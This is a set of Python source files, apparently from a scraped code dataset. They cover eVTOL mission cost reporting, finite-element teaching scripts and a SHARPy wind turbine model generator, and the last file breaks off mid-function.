print("Mission range: %0.0f nmi" %
solution("mission_range_OnDemandSizingMission").to(ureg.nautical_mile).magnitude)
print("Number of passengers: %0.1f" %
solution("N_{passengers}_OnDemandSizingMission/Passengers"))
print("Reserve type: " + reserve_type + reserve_type_string)
print("Vehicle weight during mission: %0.0f lbf" %
solution("W_{mission}_OnDemandSizingMission").to(ureg.lbf).magnitude)
print("SPL in hover: %0.1f dB" % SPL_dict["Sizing"])
print()
print("Revenue-Generating Mission (%s)" % revenue_mission_type)
print("Mission range: %0.0f nmi" %
solution("mission_range_OnDemandRevenueMission").to(ureg.nautical_mile).magnitude)
print("Number of passengers: %0.1f" %
solution("N_{passengers}_OnDemandRevenueMission/Passengers"))
print("Vehicle weight during mission: %0.0f lbf" %
solution("W_{mission}_OnDemandRevenueMission").to(ureg.lbf).magnitude)
print("Total time: %0.1f minutes" %
solution("t_{mission}_OnDemandRevenueMission").to(ureg.minute).magnitude)
print("Flight time: %0.1f minutes" %
solution("t_{flight}_OnDemandRevenueMission").to(ureg.minute).magnitude)
print("Time on ground: %0.1f minutes" %
solution("t_OnDemandRevenueMission/TimeOnGround").to(ureg.minute).magnitude)
print("SPL in hover: %0.1f dB" % SPL_dict["Revenue"])
print()
print("Deadhead Mission (%s)" % deadhead_mission_type)
print("Mission range: %0.0f nmi" %
solution("mission_range_OnDemandDeadheadMission").to(ureg.nautical_mile).magnitude)
print("Number of passengers: %0.1f" %
solution("N_{passengers}_OnDemandDeadheadMission/Passengers"))
print("Vehicle weight during mission: %0.0f lbf" %
solution("W_{mission}_OnDemandDeadheadMission").to(ureg.lbf).magnitude)
print("Total time: %0.1f minutes" %
solution("t_{mission}_OnDemandDeadheadMission").to(ureg.minute).magnitude)
print("Flight time: %0.1f minutes" %
solution("t_{flight}_OnDemandDeadheadMission").to(ureg.minute).magnitude)
print("Time on ground: %0.1f minutes" %
solution("t_OnDemandDeadheadMission/TimeOnGround").to(ureg.minute).magnitude)
print("SPL in hover: %0.1f dB" % SPL_dict["Deadhead"])
print()
print("Takeoff gross weight: %0.0f lbs" %
solution("TOGW_OnDemandAircraft").to(ureg.lbf).magnitude)
print("Empty weight: %0.0f lbs" %
solution("W_OnDemandAircraft/Structure").to(ureg.lbf).magnitude)
print("Battery weight: %0.0f lbs" %
solution("W_OnDemandAircraft/Battery").to(ureg.lbf).magnitude)
print("Vehicle purchase price: $%0.0f " %
solution("purchase_price_OnDemandAircraft"))
print("Avionics purchase price: $%0.0f " %
solution("purchase_price_OnDemandAircraft/Avionics"))
print("Battery purchase price: $%0.0f " %
solution("purchase_price_OnDemandAircraft/Battery"))
print()
print("Cost per trip: $%0.2f" %
solution("cost_per_trip_OnDemandMissionCost"))
print("Cost per trip, per passenger: $%0.2f" %
solution("cost_per_trip_per_passenger_OnDemandMissionCost"))
print("Cost per trip, per seat mile: $%0.2f per mile" %
solution("cost_per_seat_mile_OnDemandMissionCost").to(ureg.mile**-1).magnitude)
print("Cost from revenue-generating flight: $%0.2f" %
solution("revenue_cost_per_trip_OnDemandMissionCost"))
print("Cost from deadhead flight: $%0.2f" %
solution("deadhead_cost_per_trip_OnDemandMissionCost"))
print()
print("Cost Breakdown from Revenue-Generating Flight Only (no deadhead)")
print()
print("Vehicle capital expenses, per trip: $%0.2f" %
solution("cost_per_mission_OnDemandMissionCost/RevenueMissionCost/CapitalExpenses"))
print("Amortized vehicle acquisition cost, per trip: $%0.2f" %
solution("cost_per_mission_OnDemandMissionCost/RevenueMissionCost/CapitalExpenses/VehicleAcquisitionCost"))
print("Amortized avionics acquisition cost, per trip: $%0.2f" %
solution("cost_per_mission_OnDemandMissionCost/RevenueMissionCost/CapitalExpenses/AvionicsAcquisitionCost"))
print("Amortized battery acquisition cost, per trip: $%0.2f" %
solution("cost_per_mission_OnDemandMissionCost/RevenueMissionCost/CapitalExpenses/BatteryAcquisitionCost"))
print()
print("Vehicle operating expenses, per trip: $%0.2f" %
solution("cost_per_mission_OnDemandMissionCost/RevenueMissionCost/OperatingExpenses"))
print("Direct operating cost, per trip: $%0.2f" %
solution("DOC_OnDemandMissionCost/RevenueMissionCost/OperatingExpenses"))
print("Indirect operating cost, per trip: $%0.2f" %
solution("IOC_OnDemandMissionCost/RevenueMissionCost/OperatingExpenses"))
print()
print("Pilot cost, per trip: $%0.2f" %
solution("cost_per_mission_OnDemandMissionCost/RevenueMissionCost/OperatingExpenses/PilotCost"))
print("Amortized maintenance cost, per trip: $%0.2f" %
solution("cost_per_mission_OnDemandMissionCost/RevenueMissionCost/OperatingExpenses/MaintenanceCost"))
print("Energy cost, per trip: $%0.2f" %
solution("cost_per_mission_OnDemandMissionCost/RevenueMissionCost/OperatingExpenses/EnergyCost"))
#print(solution.summary())
```
{
"source": "jomorlier/FEM-Notes",
"score": 2
}
#### File: img_src/TheFEM/Four_nodes_shape_func.py
```python
from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import rcParams
#import seaborn
rcParams['font.family'] = 'serif'
rcParams['font.size'] = 14
plt.close("all")
def make_plot(x, y, N, cont):
x_cords = [-1, 1, 1, -1]
y_cords = [-1, -1, 1, 1]
fig = plt.figure(figsize=(8, 5))
ax = fig.add_subplot(111, projection='3d')
ax.plot([-1, 1, 1, -1, -1], [-1, -1, 1, 1, -1], "-ko", zorder=-10)
ax.plot([x_cords[cont-1], x_cords[cont-1]],
[y_cords[cont-1], y_cords[cont-1]], [0, 1], "--k", zorder=-10)
ax.plot_surface(x, y, N, cstride=1, rstride=1, cmap="YlGnBu_r",
alpha=0.6, lw=0.5, zorder=3)
ax.view_init(azim=-60, elev=30)
ax.set_xlabel(r"$x$", fontsize=18)
ax.set_ylabel(r"$y$", fontsize=18)
ax.set_zlabel(r"$N^%i(x, y)$"%cont, fontsize=18)
ax.set_xlim(-1, 1)
ax.set_ylim(-1, 1)
ax.set_zlim(0, 1)
plt.savefig("../../img/TheFEM/shape_func-4-nodes-%i.pdf"%cont,
bbox_inches="tight", pad_inches=0.1, transparent=True)
x, y = np.mgrid[-1:1:21j, -1:1:21j]
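# Bilinear Lagrange shape functions for the 4-noded quadrilateral in natural coordinates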
N1 = 0.25*(1 - x)*(1 - y)
N2 = 0.25*(1 + x)*(1 - y)
N3 = 0.25*(1 + x)*(1 + y)
N4 = 0.25*(1 - x)*(1 + y)
for cont, N in enumerate([N1, N2, N3, N4], start=1):
make_plot(x, y, N, cont)
plt.show()
```
#### File: FEM-Notes/scripts/lagrange.py
```python
from __future__ import division
from sympy import *
#
def LagrangPoly(x,order,i,xi=None):
r"""Compute interpolant Lagrange Polynomials
.. math::
l_j(x)=\prod_{\substack{0<m\leq k\\ m\neq j}} \frac{x - x_m}{x_j - x_m}
Parameters
----------
x : Sympy symbol
Variable for the interpolation.
order : int
Order of the polynomials.
i : int
Number of the polynomial according to `xi`.
xi : (order + 1) list of float
Position for the nodes.
Returns
-------
poly : Sympy expression
Interpolant polynomial for the `i`-th node in `xi`.
Examples
--------
>>> from lagrange import LagrangPoly as la_poly
>>> x = symbols('x')
>>> pol0 = simplify(la_poly(x, 2, 0, [-1,1,0]))
>>> pol1 = simplify(la_poly(x, 2, 1, [-1,1,0]))
>>> pol2 = simplify(la_poly(x, 2, 2, [-1,1,0]))
>>> print(pol0)
x*(x - 1)/2
>>> print(pol1)
x*(x + 1)/2
"""
if xi is None:
xi = symbols('x:%d'%(order + 1)) # default to symbolic node positions when none are given
index = list(range(order + 1))
index.pop(i)
poly = prod([(x - xi[j])/(xi[i] - xi[j]) for j in index])
return poly
# Run examples as tests
if __name__=="__main__":
import doctest
doctest.testmod()
```
#### File: scripts/SPRINGS/femutil.py
```python
import numpy as np
def uel(k):
"""Return stiffness matrix for a spring with constant `k`"""
kl = np.zeros([2,2], dtype=float)
kl[0, 0] = k
kl[0, 1] = -k
kl[1, 0] = -k
kl[1, 1] = k
return kl
```
#### File: FEM-Notes/src/stiff_4nodes.py
```python
from __future__ import division, print_function
from sympy import *
def umat(nu, E):
"""2D Elasticity constitutive matrix"""
C = zeros(3, 3)
G = E/(1 - nu**2)
mnu = (1 - nu)/2.0
C[0, 0] = G
C[0, 1] = nu*G
C[1, 0] = C[0, 1]
C[1, 1] = G
C[2, 2] = G*mnu
return C
def stdm4(x, y):
"""Four noded element strain-displacement matrix"""
B = zeros(3, 8)
N = S(1)/4*Matrix([
(1 - x)*(1 - y),
(1 + x)*(1 - y),
(1 + x)*(1 + y),
(1 - x)*(1 + y)])
dhdx=zeros(2, 4)
for i in range(4):
dhdx[0,i]=diff(N[i], x)
dhdx[1,i]=diff(N[i], y)
for i in range(4):
B[0, 2*i] = dhdx[0, i]
B[1, 2*i+1] = dhdx[1, i]
B[2, 2*i] = dhdx[1, i]
B[2, 2*i+1] = dhdx[0, i]
return B
# Assign symbols
x, y = symbols('x y')
nu, E = symbols('nu E')
h = symbols('h')
K = zeros(8, 8)
# Symbolically compute matrices
C = umat(nu, E)
B = stdm4(x, y)
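# Stiffness integrand B^T * C * B; the integration below spans the element domain x, y in [-h, h] (unit thickness assumed)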
K_int = B.T * C * B
# Integrate final stiffness
for i in range(8):
for j in range(8):
K[i,j] = integrate(K_int[i,j], (x,-h,h), (y,-h,h))
knum = K.subs([(E, S(1)), (nu, S(1)/3), (h, S(2))])
print(knum)
```
{
"source": "jomorlier/sharpy-1",
"score": 3
}
#### File: cases/templates/template_wt.py
```python
import sharpy.utils.generate_cases as gc
import pandas as pd
import numpy as np
import scipy.interpolate as scint
import math
import os
import sharpy.utils.algebra as algebra
import sharpy.utils.h5utils as h5
deg2rad = np.pi/180.
######################################################################
# AUX FUNCTIONS
######################################################################
def create_node_radial_pos_from_elem_centres(root_elem_centres_tip, num_node, num_elem, num_node_elem):
"""
create_node_radial_pos_from_elem_centres
Define the position of the nodes and the elements in the blade from the list of element centres
Args:
root_elem_centres_tip (np.array):
- First value: Radial position of the beginning of the blade
- Last value: Radial position of the tip of the blade
- Rest of the values: Radial position of the rest of the structural element centres
num_node (int): number of nodes
num_elem (int): number of elements
num_node_elem (int): number of nodes in each element
Returns:
node_r (np.array): Radial position of the nodes
elem_r (np.array): Radial position of the elements
Notes:
Radial positions are measured from the hub centre in the rotation plane
"""
elem_r = root_elem_centres_tip[1:-1]
node_r = np.zeros((num_node, ), )
node_r[0] = root_elem_centres_tip[0]
node_r[-2] = root_elem_centres_tip[-2]
node_r[-1] = root_elem_centres_tip[-1]
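# Three-noded elements: each element centre becomes a mid node; the node shared by two elements sits midway between their centres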
for ielem in range(num_elem-1):
node_r[ielem*(num_node_elem-1)+1] = elem_r[ielem]
node_r[ielem*(num_node_elem-1)+2] = 0.5*(elem_r[ielem]+elem_r[ielem+1])
return node_r, elem_r
def create_blade_coordinates(num_node, node_r, node_y, node_z):
"""
create_blade_coordinates
Creates the SHARPy format of the node coordinates and
applies prebending and presweep to the node radial positions
Args:
num_node (int): number of nodes
node_r (np.array): Radial position of the nodes
node_y (np.array): Displacement of each point IN the rotation plane
node_z (np.array): Displacement of each point OUT OF the rotation plane
Returns:
coordinates (np.array): nodes coordinates
"""
coordinates = np.zeros((num_node,3),)
coordinates[:,0] = node_r
coordinates[:,1] = node_y
coordinates[:,2] = node_z
return coordinates
######################################################################
# FROM EXCEL TYPE 01
######################################################################
def generate_from_excel_type01(chord_panels,
rotation_velocity,
pitch,
excel_file_name= 'database_type01.xlsx',
excel_sheet_structural_blade = 'structural_blade',
excel_sheet_aero_blade = 'aero_blade',
excel_sheet_airfoil_coord = 'airfoil_coord',
excel_sheet_rotor = 'rotor_parameters',
excel_sheet_structural_tower = 'structural_tower',
excel_sheet_nacelle = 'structural_nacelle',
m_distribution = 'uniform',
n_points_camber = 100,
tol_remove_points = 1e-3):
"""
generate_from_excel_type01
Function needed to generate a wind turbine from an excel database of type 01 (FAST format)
Args:
chord_panels (int): Number of panels on the blade surface in the chord direction
rotation_velocity (float): Rotation velocity of the rotor
pitch (float): pitch angle in degrees
excel_file_name (str):
excel_sheet_structural_blade (str):
excel_sheet_aero_blade (str):
excel_sheet_airfoil_coord (str):
excel_sheet_rotor (str):
excel_sheet_structural_tower (str):
excel_sheet_nacelle (str):
m_distribution (str):
n_points_camber (int): number of points to define the camber of the airfoil,
tol_remove_points (float): maximum distance to remove adjacent points
Returns:
wt (sharpy.utils.generate_cases.AeroelasticInformation): Aeroelastic information of the wind turbine
LC (list): list of all the Lagrange constraints needed in the cases (sharpy.utils.generate_cases.LagrangeConstraint)
MB (list): list of the multibody information of each body (sharpy.utils.generate_cases.BodyInformation)
"""
######################################################################
## BLADE
######################################################################
blade = gc.AeroelasticInformation()
######################################################################
### STRUCTURE
######################################################################
# Read blade structural information from excel file
Radius = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'Radius')
BlFract = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'BlFract')
AeroCent= gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'AeroCent')
# TODO: implement aerocent
print("WARNING: AeroCent not implemented")
StrcTwst= (gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'StrcTwst') + pitch)*deg2rad
BMassDen= gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'BMassDen')
FlpStff= gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'FlpStff')
EdgStff = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'EdgStff')
GJStff = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'GJStff')
EAStff = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'EAStff')
Alpha = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'Alpha')
FlpIner= gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'FlpIner')
EdgIner= gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'EdgIner')
PrecrvRef = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'PrecrvRef')
PreswpRef = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'PreswpRef')
FlpcgOf = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'FlpcgOf')
EdgcgOf = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'EdgcgOf')
FlpEAOf = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'FlpEAOf')
EdgEAOf = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'EdgEAOf')
# Base parameters
blade.StructuralInformation.num_elem = len(Radius) - 2
blade.StructuralInformation.num_node_elem = 3
blade.StructuralInformation.compute_basic_num_node()
# Interpolate excel variables into the correct locations
# Geometry
node_r, elem_r = create_node_radial_pos_from_elem_centres(Radius,
blade.StructuralInformation.num_node,
blade.StructuralInformation.num_elem,
blade.StructuralInformation.num_node_elem)
node_prebending = np.interp(node_r,Radius,PrecrvRef)
node_presweept = np.interp(node_r,Radius,PreswpRef)
node_structural_twist = -1.0*np.interp(node_r,Radius,StrcTwst)
# Stiffness
elem_EA = np.interp(elem_r,Radius,EAStff)
elem_EIy = np.interp(elem_r,Radius,FlpStff)
elem_EIz = np.interp(elem_r,Radius,EdgStff)
elem_GJ = np.interp(elem_r,Radius,GJStff)
# Stiffness: estimate unknown properties
print('WARNING: The Poisson coefficient is assumed equal to 0.3')
print('WARNING: Cross-section area is used as shear area')
poisson_coef = 0.3
elem_GAy = elem_EA/2.0/(1.0+poisson_coef)
elem_GAz = elem_EA/2.0/(1.0+poisson_coef)
# Inertia
# TODO: check yz axis and Flap-edge
elem_pos_cg_B = np.zeros((blade.StructuralInformation.num_elem,3),)
elem_pos_cg_B[:,2]=np.interp(elem_r,Radius,FlpcgOf)
elem_pos_cg_B[:,1]=np.interp(elem_r,Radius,EdgcgOf)
elem_mass_per_unit_length = np.interp(elem_r,Radius,BMassDen)
elem_mass_iner_y = np.interp(elem_r,Radius,FlpIner)
elem_mass_iner_z = np.interp(elem_r,Radius,EdgIner)
# Inertia: estimate unknown properties
print('WARNING: Using perpendicular axis theorem to compute the inertia around xB')
elem_mass_iner_x = elem_mass_iner_y + elem_mass_iner_z
# Generate blade structural properties
blade.StructuralInformation.create_mass_db_from_vector(elem_mass_per_unit_length, elem_mass_iner_x, elem_mass_iner_y, elem_mass_iner_z, elem_pos_cg_B)
blade.StructuralInformation.create_stiff_db_from_vector(elem_EA, elem_GAy, elem_GAz, elem_GJ, elem_EIy, elem_EIz)
coordinates = create_blade_coordinates(blade.StructuralInformation.num_node, node_r, node_prebending, node_presweept)
blade.StructuralInformation.generate_1to1_from_vectors(
num_node_elem = blade.StructuralInformation.num_node_elem,
num_node = blade.StructuralInformation.num_node,
num_elem = blade.StructuralInformation.num_elem,
coordinates = coordinates,
stiffness_db = blade.StructuralInformation.stiffness_db,
mass_db = blade.StructuralInformation.mass_db,
frame_of_reference_delta = 'y_AFoR',
vec_node_structural_twist = node_structural_twist,
num_lumped_mass = 0)
# Boundary conditions
blade.StructuralInformation.boundary_conditions = np.zeros((blade.StructuralInformation.num_node), dtype = int)
blade.StructuralInformation.boundary_conditions[0] = 1
blade.StructuralInformation.boundary_conditions[-1] = -1
######################################################################
### AERODYNAMICS
######################################################################
# Read blade aerodynamic information from excel file
excel_aero_r = gc.read_column_sheet_type01(excel_file_name, excel_sheet_aero_blade, 'Rnodes')
excel_aerodynamic_twist = gc.read_column_sheet_type01(excel_file_name, excel_sheet_aero_blade, 'AeroTwst')*deg2rad
excel_chord = gc.read_column_sheet_type01(excel_file_name, excel_sheet_aero_blade, 'Chord')
pure_airfoils_names = gc.read_column_sheet_type01(excel_file_name, excel_sheet_aero_blade, 'Airfoil_Table')
# Read coordinates of the pure airfoils
n_elem_aero = len(excel_aero_r)
# TODO: change this with a list of thickness and pure airfoils
pure_airfoils_camber=np.zeros((n_elem_aero,n_points_camber,2),)
xls = pd.ExcelFile(excel_file_name)
excel_db = pd.read_excel(xls, sheet_name=excel_sheet_airfoil_coord)
for iairfoil in range(len(pure_airfoils_names)):
# Look for the NaN
icoord=2
while(not(math.isnan(excel_db["%s_x" % pure_airfoils_names[iairfoil]][icoord]))):
icoord+=1
if(icoord==len(excel_db["%s_x" % pure_airfoils_names[iairfoil]])):
break
# Compute the camber of the airfoil
pure_airfoils_camber[iairfoil,:,0], pure_airfoils_camber[iairfoil,:,1] = gc.get_airfoil_camber(excel_db["%s_x" % pure_airfoils_names[iairfoil]][2:icoord] , excel_db["%s_y" % pure_airfoils_names[iairfoil]][2:icoord], n_points_camber)
# Basic variables
n_elem_aero = len(excel_aero_r)
num_airfoils = blade.StructuralInformation.num_node
surface_distribution = np.zeros((blade.StructuralInformation.num_elem), dtype=int)
# Interpolate in the correct positions
node_chord=np.interp(node_r, excel_aero_r, excel_chord)
node_aero_twist = -1.0*(np.interp(node_r, excel_aero_r, excel_aerodynamic_twist) + node_structural_twist)
node_sweep = np.ones((blade.StructuralInformation.num_node), )*np.pi
node_elastic_axis=np.ones((blade.StructuralInformation.num_node,))*0.25
# Define the nodes with aerodynamic properties
# Look for the first element that is going to be aerodynamic
first_aero_elem=0
while (elem_r[first_aero_elem]<=excel_aero_r[0]):
first_aero_elem+=1
first_aero_node=first_aero_elem*(blade.StructuralInformation.num_node_elem-1)
aero_node = np.zeros((blade.StructuralInformation.num_node,), dtype=bool)
aero_node[first_aero_node:]=np.ones((blade.StructuralInformation.num_node-first_aero_node,),dtype=bool)
airfoils = blade.AerodynamicInformation.interpolate_airfoils_camber(pure_airfoils_camber,excel_aero_r, node_r, n_points_camber)
# Write SHARPy format
airfoil_distribution = np.linspace(0,blade.StructuralInformation.num_node-1,blade.StructuralInformation.num_node, dtype=int)
blade.AerodynamicInformation.create_aerodynamics_from_vec(blade.StructuralInformation,
aero_node,
node_chord,
node_aero_twist,
node_sweep,
chord_panels,
surface_distribution,
m_distribution,
node_elastic_axis,
airfoil_distribution,
airfoils)
######################################################################
## ROTOR
######################################################################
# Read from excel file
numberOfBlades = gc.read_column_sheet_type01(excel_file_name, excel_sheet_rotor, 'NumberOfBlades')
tilt = gc.read_column_sheet_type01(excel_file_name, excel_sheet_rotor, 'Tilt')*deg2rad
cone = gc.read_column_sheet_type01(excel_file_name, excel_sheet_rotor, 'Cone')*deg2rad
# pitch = gc.read_column_sheet_type01(excel_file_name, excel_sheet_rotor, 'Pitch')*deg2rad
# Apply coning
blade.StructuralInformation.rotate_around_origin(np.array([0.,1.,0.]), cone)
# Build the whole rotor
rotor = blade.copy()
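# Remaining blades are rotated copies of the first, spaced 360/numberOfBlades degrees apart about the rotation axis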
for iblade in range(numberOfBlades-1):
blade2 = blade.copy()
blade2.StructuralInformation.rotate_around_origin(np.array([0.,0.,1.]), (iblade+1)*(360.0/numberOfBlades)*deg2rad)
rotor.assembly(blade2)
blade2 = None
rotor.remove_duplicated_points(tol_remove_points)
# Apply tilt
rotor.StructuralInformation.rotate_around_origin(np.array([0.,1.,0.]), -tilt)
######################################################################
## TOWER
######################################################################
# Read from excel file
Elevation = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'Elevation')
TMassDen = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TMassDen')
TwFAStif = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwFAStif')
TwSSStif = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwSSStif')
TwGJStif = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwGJStif')
TwEAStif = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwEAStif')
TwFAIner = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwFAIner')
TwSSIner = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwSSIner')
TwFAcgOf = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwFAcgOf')
TwSScgOf = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwSScgOf')
# Define the TOWER
tower = gc.AeroelasticInformation()
tower.StructuralInformation.num_elem = len(Elevation) - 2
tower.StructuralInformation.num_node_elem = 3
tower.StructuralInformation.compute_basic_num_node()
# Interpolate excel variables into the correct locations
node_r, elem_r = create_node_radial_pos_from_elem_centres(Elevation,
tower.StructuralInformation.num_node,
tower.StructuralInformation.num_elem,
tower.StructuralInformation.num_node_elem)
# Stiffness
elem_EA = np.interp(elem_r,Elevation,TwEAStif)
elem_EIz = np.interp(elem_r,Elevation,TwSSStif)
elem_EIy = np.interp(elem_r,Elevation,TwFAStif)
elem_GJ = np.interp(elem_r,Elevation,TwGJStif)
# Stiffness: estimate unknown properties
print('WARNING: The Poisson coefficient is assumed equal to 0.3')
print('WARNING: The cross-section area is used as the shear area')
poisson_coef = 0.3
elem_GAy = elem_EA/2.0/(1.0+poisson_coef)
elem_GAz = elem_EA/2.0/(1.0+poisson_coef)
# Inertia
elem_mass_per_unit_length = np.interp(elem_r,Elevation,TMassDen)
elem_mass_iner_y = np.interp(elem_r,Elevation,TwFAIner)
elem_mass_iner_z = np.interp(elem_r,Elevation,TwSSIner)
# TODO: check yz axis and Flap-edge
elem_pos_cg_B = np.zeros((tower.StructuralInformation.num_elem,3),)
elem_pos_cg_B[:,1]=np.interp(elem_r,Elevation,TwSScgOf)
elem_pos_cg_B[:,2]=np.interp(elem_r,Elevation,TwFAcgOf)
# Inertia: estimate unknown properties
print('WARNING: Using perpendicular axis theorem to compute the inertia around xB')
elem_mass_iner_x = elem_mass_iner_y + elem_mass_iner_z
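# Illustrative check (values made up, not from the database): for a thin planar
# cross-section the perpendicular axis theorem gives I_x = I_y + I_z, e.g.
# I_y = 2.0e3 kg*m and I_z = 3.0e3 kg*m per unit length -> I_x = 5.0e3 kg*m.
# Together with the shear estimate GA = EA/(2*(1 + 0.3)) above, these are rough
# substitutes for properties the database does not provide.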
# Create the tower
tower.StructuralInformation.create_mass_db_from_vector(elem_mass_per_unit_length, elem_mass_iner_x, elem_mass_iner_y, elem_mass_iner_z, elem_pos_cg_B)
tower.StructuralInformation.create_stiff_db_from_vector(elem_EA, elem_GAy, elem_GAz, elem_GJ, elem_EIy, elem_EIz)
coordinates = np.zeros((tower.StructuralInformation.num_node,3),)
coordinates[:,0] = node_r
tower.StructuralInformation.generate_1to1_from_vectors(
num_node_elem = tower.StructuralInformation.num_node_elem,
num_node = tower.StructuralInformation.num_node,
num_elem = tower.StructuralInformation.num_elem,
coordinates = coordinates,
stiffness_db = tower.StructuralInformation.stiffness_db,
mass_db = tower.StructuralInformation.mass_db,
frame_of_reference_delta = 'y_AFoR',
vec_node_structural_twist = np.zeros((tower.StructuralInformation.num_node,),),
num_lumped_mass = 1)
tower.StructuralInformation.boundary_conditions = np.zeros((tower.StructuralInformation.num_node), dtype = int)
tower.StructuralInformation.boundary_conditions[0] = 1
# Read overhang and nacelle properties from excel file
overhang_len = gc.read_column_sheet_type01(excel_file_name, excel_sheet_nacelle, 'overhang')
HubMass = gc.read_column_sheet_type01(excel_file_name, excel_sheet_nacelle, 'HubMass')
NacelleMass = gc.read_column_sheet_type01(excel_file_name, excel_sheet_nacelle, 'NacelleMass')
NacelleYawIner = gc.read_column_sheet_type01(excel_file_name, excel_sheet_nacelle, 'NacelleYawIner')
# Include nacelle mass
tower.StructuralInformation.lumped_mass_nodes = np.array([tower.StructuralInformation.num_node-1], dtype=int)
tower.StructuralInformation.lumped_mass = np.array([NacelleMass], dtype=float)
tower.AerodynamicInformation.set_to_zero(tower.StructuralInformation.num_node_elem,
tower.StructuralInformation.num_node,
tower.StructuralInformation.num_elem)
# Assemble the overhang with the tower
overhang = gc.AeroelasticInformation()
overhang.StructuralInformation.num_node = 3
overhang.StructuralInformation.num_node_elem = 3
overhang.StructuralInformation.compute_basic_num_elem()
node_pos = np.zeros((overhang.StructuralInformation.num_node,3), )
node_pos[:,0] += tower.StructuralInformation.coordinates[-1,0]
# 'tilt' is already in radians; do not multiply by deg2rad again
node_pos[:,0] += np.linspace(0., overhang_len*np.sin(tilt), overhang.StructuralInformation.num_node)
node_pos[:,2] = np.linspace(0., -overhang_len*np.cos(tilt), overhang.StructuralInformation.num_node)
# TODO: replace the following with real values
# Same properties as the last element of the tower
print("WARNING: Using the structural properties of the last tower section for the overhang")
oh_mass_per_unit_length = tower.StructuralInformation.mass_db[-1,0,0]
oh_mass_iner = tower.StructuralInformation.mass_db[-1,3,3]
oh_EA = tower.StructuralInformation.stiffness_db[-1,0,0]
oh_GA = tower.StructuralInformation.stiffness_db[-1,1,1]
oh_GJ = tower.StructuralInformation.stiffness_db[-1,3,3]
oh_EI = tower.StructuralInformation.stiffness_db[-1,4,4]
overhang.StructuralInformation.generate_uniform_sym_beam(node_pos,
oh_mass_per_unit_length,
oh_mass_iner,
oh_EA,
oh_GA,
oh_GJ,
oh_EI,
num_node_elem = 3,
y_BFoR = 'y_AFoR',
num_lumped_mass=0)
overhang.StructuralInformation.boundary_conditions = np.zeros((overhang.StructuralInformation.num_node), dtype = int)
overhang.StructuralInformation.boundary_conditions[-1] = -1
overhang.AerodynamicInformation.set_to_zero(overhang.StructuralInformation.num_node_elem,
overhang.StructuralInformation.num_node,
overhang.StructuralInformation.num_elem)
tower.assembly(overhang)
tower.remove_duplicated_points(tol_remove_points)
######################################################################
## WIND TURBINE
######################################################################
# Assemble the whole case
wt = tower.copy()
hub_position = tower.StructuralInformation.coordinates[-1,:]
rotor.StructuralInformation.coordinates += hub_position
wt.assembly(rotor)
# Redefine the body numbers
wt.StructuralInformation.body_number *= 0
wt.StructuralInformation.body_number[tower.StructuralInformation.num_elem:wt.StructuralInformation.num_elem] += 1
######################################################################
## MULTIBODY
######################################################################
# Define the boundary condition between the rotor and the tower tip
LC1 = gc.LagrangeConstraint()
LC1.behaviour = 'hinge_node_FoR_constant_vel'
LC1.node_in_body = tower.StructuralInformation.num_node-1
LC1.body = 0
LC1.body_FoR = 1
LC1.rot_axisB = np.array([1.,0.,0.0])
LC1.rot_vel = -rotation_velocity
LC = []
LC.append(LC1)
# Define the multibody information for the tower and the rotor
MB1 = gc.BodyInformation()
MB1.body_number = 0
MB1.FoR_position = np.zeros((6,),)
MB1.FoR_velocity = np.zeros((6,),)
MB1.FoR_acceleration = np.zeros((6,),)
MB1.FoR_movement = 'prescribed'
MB1.quat = np.array([1.0,0.0,0.0,0.0])
MB2 = gc.BodyInformation()
MB2.body_number = 1
MB2.FoR_position = np.array([rotor.StructuralInformation.coordinates[0, 0], rotor.StructuralInformation.coordinates[0, 1], rotor.StructuralInformation.coordinates[0, 2], 0.0, 0.0, 0.0])
MB2.FoR_velocity = np.array([0.,0.,0.,0.,0.,rotation_velocity])
MB2.FoR_acceleration = np.zeros((6,),)
MB2.FoR_movement = 'free'
MB2.quat = algebra.euler2quat(np.array([0.0,tilt,0.0]))
MB = []
MB.append(MB1)
MB.append(MB2)
######################################################################
## RETURN
######################################################################
return wt, LC, MB
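# Hypothetical usage sketch for the (wt, LC, MB) triple returned above. The
# writer calls are assumed from sharpy.utils.generate_cases and should be
# checked against the installed SHARPy version:
#
#   wt, LC, MB = <this generator>(...)
#   wt.generate_h5_files('./', 'wind_turbine')        # assumed: writes fem.h5/aero.h5
#   gc.generate_multibody_file(LC, MB, './', 'wind_turbine')  # assumed writer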
######################################################################
# FROM OpenFAST database
######################################################################
def rotor_from_OpenFAST_db(chord_panels,
rotation_velocity,
pitch_deg,
excel_file_name= 'database_OpenFAST.xlsx',
excel_sheet_parameters = 'parameters',
excel_sheet_structural_blade = 'structural_blade',
excel_sheet_aero_blade = 'aero_blade',
